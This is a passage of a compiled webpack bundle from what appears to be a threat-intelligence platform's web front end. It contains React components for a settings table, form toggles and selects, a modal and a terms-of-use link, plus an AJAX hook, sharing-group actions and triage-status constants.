}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/* Generic Table Component used for Settings Pages:
 * Currently used for: Users, Companies, Enlaves Tables
 *
 * Table Component API:
 *
 * All <TableColumns /> have these props:
 *
 * <props>:     <description>
 * identifier:  Unique idetifier for column
 * width:       Width of the column
 * title:       A string or JSX rendered as the column title
 * fields:      Key paths of the fields which become arguments in the render method
 * render:      Cell render method which recievs fields[] props as arugments
 *
 * The SettingsTable receives a prop {content} which contains the row data
 * to be mapped over (e.g. list of users). The component aggregates the
 * cell mapping functions from the TableColumns (above ^), which are present
 * here as props.children. Then it maps over the {content} applying the
 * logic from the TableColumns.
 *
 **/
var SettingsTable = function (_React$Component4) {
  _inherits(SettingsTable, _React$Component4);

  function SettingsTable() {
    var _ref;

    var _temp, _this4, _ret;

    _classCallCheck(this, SettingsTable);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this4 = _possibleConstructorReturn(this, (_ref = SettingsTable.__proto__ || Object.getPrototypeOf(SettingsTable)).call.apply(_ref, [this].concat(args))), _this4), _this4.getScrollContainer = function () {
      return _this4.container;
    }, _temp), _possibleConstructorReturn(_this4, _ret);
  }

  _createClass(SettingsTable, [{
    key: 'render',
    value: function render() {
      var _this5 = this;

      var _props3 = this.props,
          content = _props3.content,
          children = _props3.children,
          tableHeight = _props3.tableHeight;

      var propsTemplate = children.map(function (c) {
        return c.props;
      });
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { 'data-cy': 'settings-table', className: cx('SettingsTable') },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('HeaderRow') },
          propsTemplate.map(function (t) {
            return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              'div',
              {
                key: JSON.stringify(t.fields) + t.identifier,
                className: cx('HeaderCell'),
                style: { width: t.width } },
              t.title
            );
          }),
          this.props.scrollLoading && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5_trustar_components__["s" /* Spinner */], null)
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          {
            ref: function ref(el) {
              _this5.container = el;
            },
            onScroll: this.props.onScroll,
            className: cx('TableContainer'),
            style: { height: tableHeight } },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { className: cx('TableContent') },
            content.map(function (item) {
              // Use guid or id for unique ID for cell element
              var uniqueItemId = item.get('guid', item.get('id'));
              return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                'div',
                { 'data-cy': 'table-row', key: uniqueItemId, className: cx('TableRow') },
                propsTemplate.map(function (t) {
                  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                    'div',
                    {
                      key: uniqueItemId + t.identifier,
                      className: cx('Cell'),
                      style: { width: t.width } },
                    t.render.apply(t, _toConsumableArray(t.fields.map(function (f) {
                      return Array.isArray(f) ? item.getIn(f) : item.get(f);
                    })))
                  );
                })
              );
            })
          )
        )
      );
    }
  }]);

  return SettingsTable;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 1629 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "ts-logo-color.a789f0fb111dc0c4eaa65dec9b845992.svg";

/***/ }),
/* 1630 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return getGroupLabel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return EXECUTE_SEARCH_AFTEWARDS; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_modules_enclave_types__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



// Enclave Groups
var groupLabels = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  INTERNAL: 'My Enclaves',
  CLOSED_CONCRETE: 'Closed Source',
  OPEN: 'Open Source'
});

var getGroupLabel = function getGroupLabel(labelName) {
  return groupLabels.get(labelName) || 'Other Enclaves';
};

var EXECUTE_SEARCH_AFTEWARDS = true;

/***/ }),
/* 1631 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1417);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1384);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(3202);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(3203);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(301);
/* unused harmony reexport types */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_js__ = __webpack_require__(882);
/* unused harmony reexport utils */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants_js__ = __webpack_require__(404);
/* unused harmony reexport constants */















/***/ }),
/* 1632 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return TermsOfUseLink; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);

// $FlowFixMe: useState exists



var StyledTermLinkContainer = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'EulaArticle__StyledTermLinkContainer',
  componentId: 'vk4lil-0'
})(['padding:1rem;display:flex;flex-direction:column;justify-content:center;align-items:center;&& p{font-size:1.25rem;}']);

var TermsLinkText = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].a.withConfig({
  displayName: 'EulaArticle__TermsLinkText',
  componentId: 'vk4lil-1'
})(['&&{display:block;font-size:1.5rem;color:', ';:hover{color:', ';text-decoration:underline;}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.TEXT.hex;
});

var TermsPageLink = function TermsPageLink(props) {
  var onceClicked = props.onceClicked;


  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledTermLinkContainer,
    { onClick: onceClicked },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'p',
      null,
      ' Please read the terms and conditions article in the link below to begin using the platform '
    ),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      TermsLinkText,
      { href: 'https://www.trustar.co/terms-of-use', target: '_blank' },
      ' Terms of Use Document '
    )
  );
};

var TermsOfUseLink = function TermsOfUseLink(props) {
  var clickedOnTermsUrl = props.clickedOnTermsUrl;


  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(TermsPageLink, { onceClicked: clickedOnTermsUrl });
};

/***/ }),
/* 1633 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return RenderToggle; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return RenderSelect; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return RenderFieldToggle; });
/* unused harmony export RenderSelectWithIcon */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_form_immutable__ = __webpack_require__(180);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_form_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_form_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_components__ = __webpack_require__(295);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }






var RenderToggle = function RenderToggle(_ref) {
  var _ref$input = _ref.input,
      checked = _ref$input.checked,
      _onChange = _ref$input.onChange,
      className = _ref.className,
      identifier = _ref.identifier,
      cyid = _ref.cyid;
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_3_trustar_components__["x" /* Toggle */], {
    cyid: cyid || identifier,
    checked: checked,
    className: className,
    onChange: function onChange() {
      return _onChange(!checked);
    } });
};

var normalizeToJS = function normalizeToJS(x) {
  if (x && typeof x.toJS === 'function') {
    return x.toJS();
  } else {
    return x;
  }
};

var RenderSelect = function RenderSelect(props) {
  var _props$input = props.input,
      value = _props$input.value,
      _onChange2 = _props$input.onChange,
      meta = props.meta,
      multi = props.multi,
      options = props.options,
      placeholder = props.placeholder,
      className = props.className,
      identifier = props.identifier,
      cyid = props.cyid,
      _props$SelectComponen = props.SelectComponent,
      SelectComponent = _props$SelectComponen === undefined ? __WEBPACK_IMPORTED_MODULE_3_trustar_components__["q" /* Select */] : _props$SelectComponen,
      childProps = _objectWithoutProperties(props, ['input', 'meta', 'multi', 'options', 'placeholder', 'className', 'identifier', 'cyid', 'SelectComponent']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    { 'data-cy': cyid || 'select-field' },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(SelectComponent, _extends({}, childProps, {
      multi: !!multi,
      options: options,
      className: className,
      placeholder: placeholder,
      value: normalizeToJS(value),
      onChange: function onChange(e) {
        return _onChange2(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(e));
      }
    })),
    meta && meta.error && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'span',
      null,
      meta.error
    )
  );
};


var RenderFieldToggle = function RenderFieldToggle(_ref2) {
  var name = _ref2.name,
      checked = _ref2.checked,
      disabled = _ref2.disabled,
      className = _ref2.className,
      label = _ref2.label,
      labelClassName = _ref2.labelClassName,
      id = _ref2.id;

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1_redux_form_immutable__["Field"], {
    type: 'checkbox',
    name: name,
    checked: checked,
    disabled: disabled,
    label: label,
    id: id,
    labelClassName: labelClassName,
    component: function component(_ref3) {
      var input = _ref3.input,
          childProps = _objectWithoutProperties(_ref3, ['input']);

      var checked = input.checked,
          _onChange3 = input.onChange;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_3_trustar_components__["x" /* Toggle */], _extends({}, childProps, {
        checked: checked,
        className: className,
        onChange: function onChange() {
          return _onChange3(!checked);
        } }));
    } });
};

// TODO: Refactor classNames...

var RenderSelectWithIcon = function RenderSelectWithIcon(props) {
  var _props$input2 = props.input,
      value = _props$input2.value,
      _onChange4 = _props$input2.onChange,
      icon = props.icon,
      multi = props.multi,
      options = props.options,
      placeholder = props.placeholder,
      innerClassName = props.innerClassName,
      outerClassName = props.outerClassName,
      cyid = props.cyid,
      identifier = props.identifier,
      _props$SelectComponen2 = props.SelectComponent,
      SelectComponent = _props$SelectComponen2 === undefined ? __WEBPACK_IMPORTED_MODULE_3_trustar_components__["q" /* Select */] : _props$SelectComponen2,
      childProps = _objectWithoutProperties(props, ['input', 'icon', 'multi', 'options', 'placeholder', 'innerClassName', 'outerClassName', 'cyid', 'identifier', 'SelectComponent']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    { 'data-cy': cyid || 'select-field-with-icon', className: outerClassName },
    icon && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa ' + icon }),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(SelectComponent, _extends({}, childProps, {
      multi: !!multi,
      options: options,
      className: innerClassName,
      placeholder: placeholder,
      value: normalizeToJS(value),
      onChange: function onChange(e) {
        return _onChange4(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(e));
      }
    }))
  );
};


/***/ }),
/* 1634 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Modal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ModalTitle; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return NuModalTitle; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_portal__ = __webpack_require__(410);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_portal___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_portal__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__icons_Icons__ = __webpack_require__(803);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Modal_styl__ = __webpack_require__(3481);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Modal_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5__Modal_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }







var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_5__Modal_styl___default.a);

var ESCAPE = 27;

var StyledModalTitle = __WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Modal__StyledModalTitle',
  componentId: 'sc-3pmfgz-0'
})(['position:relative;line-height:50px;background:', ';border-bottom:1px solid ', ';color:', ';border-radius:6px 6px 0px 0px;font-size:1.34rem;letter-spacing:1px;user-select:none;text-align:center;'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.LIGHT_GRAY_SURFACE.hex;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.BORDER.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.TEXT.hex;
});

var StyledModalInnerContainer = __WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Modal__StyledModalInnerContainer',
  componentId: 'sc-3pmfgz-1'
})(['position:absolute;margin-bottom:150px;top:200px;left:50%;transform:translateX(-50%);min-width:51.67rem;background-color:', ';border:1px solid ', ';border-radius:6px;box-shadow:0px 3px 54px 14px rgba(0,0,0,0.14);color:', ';'], function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.BORDER.hex;
}, function (_ref6) {
  var theme = _ref6.theme;
  return theme.ThemeColors.TEXT.hex;
});

/**
 * Modal is essentially a customized version of react portal.
 *
 * Children mmust be passed to the modal, otherwise it will have nothing to
 * render other than the overlay.
 *
 * NOTE: We pass a prop called isOpen, while the modal supports the isOpened
 * param. That is just poor english.
 * UPDATE: I think the latest version may have corrected this.
 */

var Modal = function (_React$Component) {
  _inherits(Modal, _React$Component);

  function Modal() {
    var _ref7;

    var _temp, _this, _ret;

    _classCallCheck(this, Modal);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref7 = Modal.__proto__ || Object.getPrototypeOf(Modal)).call.apply(_ref7, [this].concat(args))), _this), _this.closeOnEscape = function (e) {
      if (e.which !== ESCAPE) return;
      e.stopPropagation();
      _this.props.onToggleModal();
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(Modal, [{
    key: 'render',


    /**
     * NOTE: tabIndex is necessary to capture keyboard events on a div.
     */
    value: function render() {
      var _props = this.props,
          children = _props.children,
          isOpen = _props.isOpen,
          onToggleModal = _props.onToggleModal,
          className = _props.className,
          theme = _props.theme,
          style = _props.style,
          outerClassName = _props.outerClassName,
          props = _objectWithoutProperties(_props, ['children', 'isOpen', 'onToggleModal', 'className', 'theme', 'style', 'outerClassName']);

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        __WEBPACK_IMPORTED_MODULE_1_react_portal___default.a,
        _extends({ isOpened: isOpen }, props),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          {
            tabIndex: 0,
            onKeyUp: this.closeOnEscape,
            className: cx(__WEBPACK_IMPORTED_MODULE_5__Modal_styl___default.a.outerModal, theme, outerClassName),
            onClick: onToggleModal },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            StyledModalInnerContainer,
            {
              style: style,
              onClick: function onClick(e) {
                return e.stopPropagation();
              }, className: cx(__WEBPACK_IMPORTED_MODULE_5__Modal_styl___default.a.innerModal, className)
            },
            children
          )
        )
      );
    }
  }]);

  return Modal;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

var ModalTitle = function ModalTitle(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledModalTitle,
    _extends({}, props, { className: cx(__WEBPACK_IMPORTED_MODULE_5__Modal_styl___default.a.ModalTitle, props.className) }),
    props.children,
    props.onToggleModal && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: cx('fa fa-times', __WEBPACK_IMPORTED_MODULE_5__Modal_styl___default.a.closeButton), onClick: props.onToggleModal })
  );
};

var NuModalTitle = function NuModalTitle(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    _extends({}, props, { className: cx(__WEBPACK_IMPORTED_MODULE_5__Modal_styl___default.a.NuModalTitle, props.className) }),
    props.children,
    props.onToggleModal && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4__icons_Icons__["b" /* CloseIcon */], { className: cx('closeButton'), onClick: props.onToggleModal })
  );
};

/***/ }),
/* 1635 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var _require = __webpack_require__(3547),
    CopyToClipboard = _require.CopyToClipboard;

CopyToClipboard.CopyToClipboard = CopyToClipboard;
module.exports = CopyToClipboard;

/***/ }),
/* 1636 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return resetFavicon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return getBrowserQueryParams; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_img_favicon_ico__ = __webpack_require__(3674);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_img_favicon_ico___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_trustar_img_favicon_ico__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_querystring__);




var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:components:AppUtils'); // eslint-disable-line no-unused-vars

/**
 * This was to counter an issue we saw in firefox. See 3d4775e for full
 * details.
 */
var resetFavicon = function resetFavicon() {
  return Object(__WEBPACK_IMPORTED_MODULE_0_trustar_fp__["IO"])(function () {
    return document.getElementById('favicon');
  }).map(function (el) {
    var link = el.cloneNode(true);
    link.href = __WEBPACK_IMPORTED_MODULE_1_trustar_img_favicon_ico___default.a;
    return link;
  })
  // $FlowIgnore: This is IO so it doesn't matter if this throws
  .map(function (link) {
    return document.head.appendChild(link);
  }).fold(debug, function () {
    return debug('Favicon reset');
  });
};

/**
 * Fetches a current URL's query params
 * @returns {*}
 */
var getBrowserQueryParams = function getBrowserQueryParams() {
  return __WEBPACK_IMPORTED_MODULE_3_querystring___default.a.parse(location.search.replace(/^\?/, ''));
};

/***/ }),
/* 1637 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveSharingGroup", function() { return saveSharingGroup; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "editSharingGroup", function() { return editSharingGroup; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteSharingGroup", function() { return deleteSharingGroup; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(718);


var fetch = function fetch() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["g" /* FETCH */]
  };
};

var saveSharingGroup = function saveSharingGroup(sharingGroup) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["j" /* SAVE */],
    payload: sharingGroup
  };
};

var editSharingGroup = function editSharingGroup(sharingGroup) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* EDIT */],
    payload: sharingGroup
  };
};

var deleteSharingGroup = function deleteSharingGroup(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* DELETE */],
    payload: id
  };
};

/***/ }),
/* 1638 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return useAjax; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils_redux_utils__ = __webpack_require__(568);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();







var useAjax = function useAjax(effectCb) {
  var shouldCall = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : true;

  var _React$useState = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()),
      _React$useState2 = _slicedToArray(_React$useState, 2),
      response = _React$useState2[0],
      setResponse = _React$useState2[1];

  var _React$useState3 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()),
      _React$useState4 = _slicedToArray(_React$useState3, 2),
      errorResponse = _React$useState4[0],
      setErrorResponse = _React$useState4[1];

  var _React$useState5 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(false),
      _React$useState6 = _slicedToArray(_React$useState5, 2),
      isLoading = _React$useState6[0],
      setIsLoading = _React$useState6[1];

  var ajax = Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils_redux_utils__["a" /* createAjax */])();

  // $FlowFixMe: React.useEffect coming soon.
  var executeRequest = function executeRequest() {
    setIsLoading(true);
    setResponse(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());

    if (!shouldCall) {
      setIsLoading(false);
      return;
    }

    var rxSubscription = effectCb(ajax).subscribe({
      complete: function complete(x) {
        setIsLoading(false);
      },
      next: function next(x) {
        setIsLoading(false);
        var responseBodyOrFullResponse = x.response || x;
        setResponse(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(responseBodyOrFullResponse));
      },
      error: function error(err) {
        setIsLoading(false);
        setErrorResponse(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(err));
      }
    });

    return function cleanup() {
      rxSubscription.unsubscribe();
    };
  };

  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    executeRequest: executeRequest,
    response: response,
    errorResponse: errorResponse,
    isLoading: isLoading
  });
};

/***/ }),
/* 1639 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return TRIAGE_STATUSES_TO_NAMES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return TRIAGE_STATUSES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return PHISHING_SCORE_VALUES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return TRIAGE_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DATE_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SCORE_FILTER_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DEFAULT_DATE_OPTION; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);


var TRIAGE_STATUSES_TO_NAMES = {
  '-1': 'UNKNOWN',
  '0': 'BENIGN',
  '1': 'LOW',
  '2': 'MEDIUM',
  '3': 'HIGH'
};

var TRIAGE_STATUSES = {
  UNKNOWN: -1,
  BENIGN: 0,
  LOW: 1,
  MEDIUM: 2,
  HIGH: 3
};

var PHISHING_SCORE_VALUES = {
  UNRESOLVED: 'UNRESOLVED',
  CONFIRMED: 'CONFIRMED',
  IGNORED: 'IGNORED'
};
